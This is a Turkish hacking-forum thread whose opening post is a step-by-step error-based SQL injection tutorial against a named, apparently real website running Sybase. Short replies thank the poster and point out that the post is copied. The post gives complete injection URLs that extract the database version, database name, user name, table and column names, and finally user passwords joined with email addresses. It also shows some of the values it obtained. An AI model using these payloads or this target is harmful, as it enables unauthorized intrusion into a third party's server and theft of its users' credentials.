THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Sybase SQL Inj. [Havijin bittiği yer]

ByPro55 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2014
Nereden:
world..
Mesajlar:
842
Konular:
101
Teşekkür (Etti):
23
Teşekkür (Aldı):
228
Ticaret:
(0) %
31-05-2014 01:15
#1
Cool
Sybase SQL Inj. [Havijin bittiği yer]
-Selamun Aleykum.

-Aslında konumuzun adı tam olarak; Error Based Sybase SQL Injection

Hedef; http://www.daily5remodel.com/index.p...cle&rowid=1852

Şimdi yukarıda ki sitede sql inj açığı var.Tabii ilk olarak havije yazdım. Bu konuda Türkçe makale yok denecek kadar azdır hatta yoktur desek yanlış olmaz.Bu yüzden Cyber-Warrior bulunmaz nimettir değerini bilelim.


Havij’in bittiği yer burasıdır.



-Tabi haviji o kadar yerden yere vurmakta ayıp olur çoğu zaman işe yarıyor sağolsun burada DB Server; Sybase ve DB Name; daily5remodel demiş yiğidin hakkını yemeyelim.Gerçi yukarıda verdiğim linke ’ koyunca bana zaten server sybase diyor.



-Versiyon Öğrenme-

Kod:
Kodumuz; +and+1=convert(integer,@@version)-- [FONT]

Alan adına; http://www.daily5remodel.com/index.php?action=article&rowid=1852+and+1=convert(integer,@@version)--
yazalım ve sonuç;



-Not; Convert; Varchar değerinde ki veriyi dönüştürmek için kullanılır.Üstte ki versiyon resminde ki VARCHAR value kısmına dikkat
integer; tam sayı anlamına gelir zaten.


-Veritabanı Adı Öğrenme -

Kod:
Kodumuz; +and+1=convert(integer,db_name())-- 
Alan adına; http://www.daily5remodel.com/index.php?action=article&rowid=1852+and+1=convert(integer,db_name())--
yazdık ve sonuç ;



-Evet buradan öteye havijle gidemedik bakalım biz nasıl gideceğiz.
Şimdi bize kullanıcı adı ve tablolar lazım.


-Kullanıcı Adı Öğrenme-

Kod:
Kodumuz; +and+1=convert(integer,user_name())-- 

Alan adına; http://www.daily5remodel.com/index.php?action=article&rowid=1852+and+1=convert(integer,user_name())--
yazdık ve sonuç ;



-Not; Elimizde ne var?

version : ’Adaptive Server Enterprise/15.0.1/EBF 13819/P/Sun_svr4/OS 5.8/ase1501/2379/64-bit/FBO/Tue Aug 15 04:20:15 2006’
Database Adı : ’daily5remodel’
Kullanıcı Adı: ’dbo’


-Şimdi sıra tablolara geldi.

-Tabloları Öğrenme-

-Buraya dikkat burada devreler yanabiliyor.Şimdi ilk tabloyu öğrenmek için;

Kod:
Kodumuz; +and+1=convert(integer,(select+min(name)+from+sysobjects where type=’U’))-- 

Şimdi alan adına; http://www.daily5remodel.com/index.php?action=article&rowid=1852+and+1=convert(integer,(select+min(name)+from+sysobjects where type=’U’))--
yazdık ve sonuç ;



-Açıklama;

+from+sysobjects where type= buraya dikkat ilk resimde havij bize ne demişti Can not get Count(name) of daily5remodel..sysobjects where xtype=char(85) biz de ona Get out of the subject diyoruz
Can not yok bizde

Şimdi orada bi ’U’ var o ne anlama geliyor.

U= Kullanıcı Tablosu

İşte kullanabileceniz diğer şeyler de var.Aşağısı artık ileri dereceye giriyor.Terimlerin bazılarını çevirmedim.Size yetecekleri çevirdim.

C – istediğiniz kolon
D – Varsayılan
F – SQLJ function
L – kayıtlar
N – partition condition
P – Transact-SQL or SQLJ procedure
PR – prepare objects (created by Dynamic SQL)
R – rule
RI – referential constraint
S – sistem tablosu
TR – trigger
U – kullanıcı tablosu
V – Görünüm
XP – extended stored procedure

Neyse kaldığımız yerden devam edelim.


-İlk tablomuz; ’ ad******** ’

İkinci Tablo için kodumuz; +and+1=convert(integer,(select+min(name)+from+syso bjects where type=’U’ and name!=’first table name’))--

Şimdi ikinci tabloyu öğrenmek için alan adına ;

http://www.daily5remodel.com/index.p...rom+sysobjects where type=’U’ and name!=’ad********’))--

burada and name!=’ad********’ kısmına dikkat kodumuz da first table yazıyor.

Şimdi alan adına bunu yazınca ’ads’ diye tablo adı verecek.Reklam tablosu yani neyse biz kullanıcıları sorgulayacağız.

+and+1=convert(integer,(select+min(name) from syscolumns where id= (select id from sysobjects where type=’U’ and name=’users’)))--

Şimdi buna adress tablosunu ekleyelim.Sonra ki tabloları çıkarmak adına.

Alan adına; http://www.daily5remodel.com/index.p...elect+min(name) from syscolumns where id= (select id from sysobjects where type=’U’ and name=’users’) and name!=’address’))-- bunu yazıyoruz ve sonuç olarak bize businesstype[/BLUE] tablosunu veriyor.


-Final Zamanı-

-Şimdi bize users tablosunda ki kullanıcıların e-mail ve şifreleri lazım.

Kod:
Alan adına; http://www.daily5remodel.com/index.php?action=article&rowid=1852 or 1=convert(numeric, (select+max(password||0x3a||email)+from+users))
yazıyoruz ve sonuç;



-- Evet Ardadaşlar Konunun Sonuna Geldik İşinize Yaradıysa Bi Teşekkürü Hor Görmeyin --

-- turkhackteam.net --

ALINTIDIR.*
Konu ByPro55 tarafından (31-05-2014 14:24 Saat 14:24 ) değiştirilmiştir.
ByPro55 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2014
Nereden:
world..
Mesajlar:
842
Konular:
101
Teşekkür (Etti):
23
Teşekkür (Aldı):
228
Ticaret:
(0) %
31-05-2014 11:33
#2
Bir yorum bile yokmu Güncel arkadaslar.
heacker1102 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
12/2012
Nereden:
www
Yaş:
18
Mesajlar:
1.724
Konular:
170
Teşekkür (Etti):
89
Teşekkür (Aldı):
361
Ticaret:
(0) %
31-05-2014 11:41
#3
Alıntı:
ByPro55´isimli üyeden Alıntı Mesajı göster
Bir yorum bile yokmu Güncel arkadaslar.
2.sayfaya düşmeden güncelleme!
Hexphase - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Nereden:
-Root/
Mesajlar:
232
Konular:
72
Teşekkür (Etti):
32
Teşekkür (Aldı):
24
Ticaret:
(0) %
31-05-2014 14:00
#4
değerli bir konu teşekkürler güncelleme lazım tabiki !
ByPro55 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2014
Nereden:
world..
Mesajlar:
842
Konular:
101
Teşekkür (Etti):
23
Teşekkür (Aldı):
228
Ticaret:
(0) %
31-05-2014 14:03
#5
Alıntı:
prophecy186´isimli üyeden Alıntı Mesajı göster
değerli bir konu teşekkürler güncelleme lazım tabiki !
-İşinize yaradıysa ne mutlu .Zamanla güncellemeye çalışacağım.
morphia - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2006
Nereden:
Black Hat
Yaş:
44
Mesajlar:
494
Konular:
4
Teşekkür (Etti):
36
Teşekkür (Aldı):
51
Ticaret:
(0) %
31-05-2014 14:07
#6
Hem Bu yüzden Cyber-Warrior bulunmaz nimettir değerini bilelim. de
hem de -- turkhackteam.net -- de
http://pastebin.com/1GM7r5nV
Güzel paylaşım +10 verdim
---------------------
بِسْــــــــــــــــــــــمِ اﷲِارَّحْمَنِ ارَّحِيم
ByPro55 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
05/2014
Nereden:
world..
Mesajlar:
842
Konular:
101
Teşekkür (Etti):
23
Teşekkür (Aldı):
228
Ticaret:
(0) %
31-05-2014 14:23
#7
Alıntı:
morphia´isimli üyeden Alıntı Mesajı göster
Hem Bu yüzden Cyber-Warrior bulunmaz nimettir değerini bilelim. de
hem de -- turkhackteam.net -- de
http://pastebin.com/1GM7r5nV
Güzel paylaşım +10 verdim
Alıntı yazmayı unutmuşum.Ama Yinede Yararlı Bulduğum İçin Paylaştım.Konuya Ekliyorum Alıntı Olduğunu

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler